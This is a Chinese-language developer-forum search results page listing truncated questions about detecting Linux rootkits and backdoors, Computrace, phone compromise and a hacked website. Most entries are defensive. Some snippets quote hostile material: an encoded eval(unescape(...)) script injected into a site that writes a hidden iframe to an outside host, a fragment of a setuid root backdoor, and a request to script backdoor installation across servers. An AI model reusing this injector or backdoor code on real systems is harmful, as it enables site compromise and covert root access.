腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
恶意软件和
后门
检测外壳脚本
、
、
我正在尝试构建一个shell脚本,它可以自动检测恶意软件、
后门
和
rootkit
,我也在对它进行研究。我发现了一些东西 find .谁能帮我给出一个大致的想法,我可以使用的脚本,以便它可以做的工作,恶意软件,
后门
和
rootkit
检测。更确切地说,如何在ubuntu系统上找到这些恶意软件、
后门
和
rootkit
。谢谢。
浏览 0
提问于2013-07-29
得票数 5
回答已采纳
3
回答
在
Linux
内核中包含二进制blobs意味着什么?
、
、
知道了这一点,从安全的角度来看,如何才能将二元水泡作为
Linux
内核的一部分来运行呢?存在一个内核的无blob版本。这个项目背后的动机似乎主要是意识形态的。二进制blob是否能包含一个
rootkit
,用于接管或打开
后门
进入整个系统?怎么能发现这样的
后门
呢?
浏览 0
提问于2013-06-10
得票数 8
回答已采纳
1
回答
英特尔SA00086 / CVE-2017-5712可远程利用吗?
、
、
我意识到,像Windows域管理一样的东西可以作为“远程管理”与本地访问相匹配,但是这如何适用于不允许远程访问根( Admin )的
Linux
系统呢?
浏览 0
提问于2017-11-24
得票数 1
回答已采纳
1
回答
如何从坏文件中知道我的ubuntu系统是清楚的?
、
如何知道我的系统是通过
后门
访问的,以及如何知道我的ubuntu系统中有
rootkit
、恶意软件或特洛伊木马。
浏览 0
提问于2016-01-08
得票数 0
回答已采纳
2
回答
计算跟踪在*NIX类系统上工作吗?
、
我已经从绝对软件中对Computrace做了大量的研究,但我还没有找到一个可靠的答案:它在
Linux
上工作吗?我读过以下研究论文,其中没有提到
Linux
或*NIX类系统一次:绝对
后门
改造 它们都专注于逆向工程,即放在Windows机器上的代理/二进制文件。我查看了在启用Computrace的多个
Linux
系统上运行的进程,但没有任何迹象。因此,我想我已经回答了我自己的问题,但出于某些原因,我不确定它100%不在
Linux
上工作。
浏览 0
提问于2020-03-11
得票数 0
1
回答
如何在ubuntu安装rkhunter?
、
、
好的,我知道这个问题听起来很奇怪,但是我需要帮助以准确的方式安装rkhunter,我需要遵循本文https://help.ubuntu.com/community/RKhunter中的所有步骤吗?
浏览 0
提问于2016-02-12
得票数 3
回答已采纳
2
回答
Rootkit
扫描
、
、
、
、
是否有任何良好的服务或方法扫描
rootkit
和
后门
? 我知道有rkhunter和chkrootkit,但他们甚至是理想的?他们从来没有更新过,看起来更像是2000年初的S。
浏览 0
提问于2012-06-13
得票数 -3
回答已采纳
1
回答
Debian
后门
/
rootkit
脚本安装
、
、
我们已经考虑过使用某种类型的
rootkit
,如果主根密码已被破坏,它将能够使我们保持访问权限。这是一个时间敏感的问题(如高SLA)。我们想要的是一个脚本,它可以获取服务器和密码列表并将这个
后门
添加到其中。我们有其他的软件来自动化其他的事情,但不幸的是这不是。这不是钓鱼或黑客攻击的目标,我们拥有并拥有对上述服务器的全部权利,我们只是不太了解脚本或
后门
类型的东西:/
浏览 0
提问于2011-11-17
得票数 0
1
回答
如何检测基于
rootkit
的
linux
内核模块?
、
我发现这个小型
rootkit
源代码是作为
Linux
内核模块实现的。https://github.com/mfontanini/Programs-Scripts/tree/master/
rootkit
基本上,如您所见,它从inode文件中更改file_operations在这种情况
下
,如何才能检测到这个
rootkit
?
浏览 0
提问于2016-02-15
得票数 2
2
回答
有没有办法找出我是怎么被黑的?缺点是什么?
我的一个网站黑了几次:(首先,我丢失了所有的数据库,一些表被清除,一些表的数据已经更改!)在第二次攻击时,所有表都被清除,一些php文件的代码被更改:/删除已创建的所有非系统Ftp帐户,或至少将密码更改为FTP帐户。检查脚本中的任何头注入攻击、Sql注入攻击、跨站点脚本攻击等,以及您的php.ini文件设置。 如果您的脚本被感染,您可能希望回滚到您的帐户的上一次良好快照备份。如果您的备份也被感染
浏览 0
提问于2010-02-23
得票数 1
1
回答
如何检查你的手机是否被黑了
、
、
由于Stagefright漏洞在许多设备上非常常见,我想问一
下
是否有任何方法来检查是否有人在给定的设备上使用过此漏洞。
后门
?
rootkit
?键盘记录器?是否有一种方法来检测智能手机上是否有什么东西不应该在运行呢?
浏览 0
提问于2015-08-19
得票数 -2
回答已采纳
1
回答
如何创建一个windows应用程序,在不一次又一次提示UAC的情况
下
,在.Net C#中使用管理权限运行?
、
、
、
我正在用.Net C#开发一个windows应用程序。应用程序正在使用一些第三方驱动程序,这需要执行它的管理权限。我知道我们可以使用app清单并在那里提供所需的特权,但是每次用户运行该应用程序时都会提示UAC,这对用户来说很烦人。那么,还有什么其他方法可以让我们不用提示用户就可以运行应用程序,或者它只提示一次,当用户下次运行应用程序时,它应该具有管理权限。
浏览 12
提问于2022-02-04
得票数 0
1
回答
macOS通用剪贴板安全吗?
、
、
、
在双因素认证码的情况
下
,需求更大,因为我只在我的iPhone上有Google身份验证器。 在iPhone和Mac之间使用通用剪贴板(基本上是通过蓝牙)粘贴密码安全吗?反之亦然?
浏览 0
提问于2017-01-23
得票数 10
1
回答
Rootkit
,Bootkit检测和保护以及固件更改
、
(从那时起,我就一直在学习
Linux
),我相信这被称为
rootkit
或bootkit。按照同样的思路,改变我的Android(s)上的固件以防止工厂数据重置有多难呢?
浏览 0
提问于2015-07-20
得票数 2
1
回答
我被感染的手机热点会感染我过时的电脑吗?
、
、
、
、
具体来说,我的Android/iPhone感染了间谍软件、
rootkit
、黑客维护持久化的
后门
,以及手机正在使用的恶意DNS服务器。感染是由于利用漏洞提供有效负载的漏洞而引发的。
Rootkit
是拥有对手机的完全根控制,并改变任何数据,以适应黑客的需要。
后门
是黑客想要通过
rootkit
执行新的命令时,在我的手机积极,如执行横向移动到另一个设备。黑客然后进入
后门
,等待计算机连接到电话。 一旦连接,就不会在计算机上进行网页浏览,所以我认为他不能通过下载将任何恶意的DNS服务器重定向到
浏览 0
提问于2023-01-09
得票数 0
回答已采纳
3
回答
检测并删除
Rootkit
什么是最好的(希望是免费或便宜的)方法来检测,然后,如果有必要,删除在您的机器上找到的
rootkit
?
浏览 4
提问于2008-09-20
得票数 2
回答已采纳
2
回答
后门
怎么走?
、
、
、
我研究了一
下
,我感到惊讶的是,在我扎根之后,把一台
Linux
机器
后门
是多么容易。0,0,0);}chown root:root backdoor因此,现在,任何用户都可以使用
后门
作为/backdoor whoami在获得root等效(NT AUTHORITY\SYS
浏览 0
提问于2022-11-09
得票数 -1
2
回答
rootkit
能否写入内核进程的虚拟内存并重写指令以跳入该进程中自己的恶意代码?
、
、
、
因此,假设我们的系统上有一个
rootkit
这个
rootkit
能在内核进程中写一些东西吗?例如,在windows中,
rootkit
是否可以写入ntoskrnl进程,更改某些函数并创建新的函数,例如,当发生interupt和操作系统从IDT读取相应的函数并试图在ntoskrnl进程中执行该函数时,rookit将替换该函数的第一条指令跳到
rootkit
编写并因此执行恶意代码的另一个位置?我在问关于windows和
linux
的问题,如果它们各自不同,请告诉我
浏览 0
提问于2019-05-04
得票数 1
回答已采纳
1
回答
隐若逃不掉
、
、
几天前开始帮助一家公司建立网站..。我注意到服务器上的一些html和php文件中有一些奇怪的代码: <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%6E%69%65%73%73%2E%63%6F%6D%2F%3F%32%38%34%36%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%
浏览 0
提问于2010-07-23
得票数 0
1
回答
如何删除ssh
rootkit
?
、
、
、
我用rkhunter检查了我的
linux
服务器,收到了以下警告消息, . 00:35:35找到文件'/usr/include/gpm2.h‘。可能的
rootkit
:安装木马的SSH守护进程00:35:35找到文件'/etc/rpm/sshdOLD‘。可能的
rootkit
:安装木马的SSH守护进程(原始sshd二进制文件) 00:35:35找到文件'/etc/rpm/sshOLD‘。可能的
rootkit
:特
浏览 0
提问于2013-07-12
得票数 3
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
burp trick;Retile:LKM Linux rootkit和后门
Linux下的Rootkit驻留技术分析
Linux后门整理合集
Chaos:Linux后门卷土重来
后门程序SpeakUp来袭 6版Linux系统受波及
热门
标签
更多标签
云服务器
ICP备案
实时音视频
云直播
对象存储
活动推荐
运营活动
广告
关闭
领券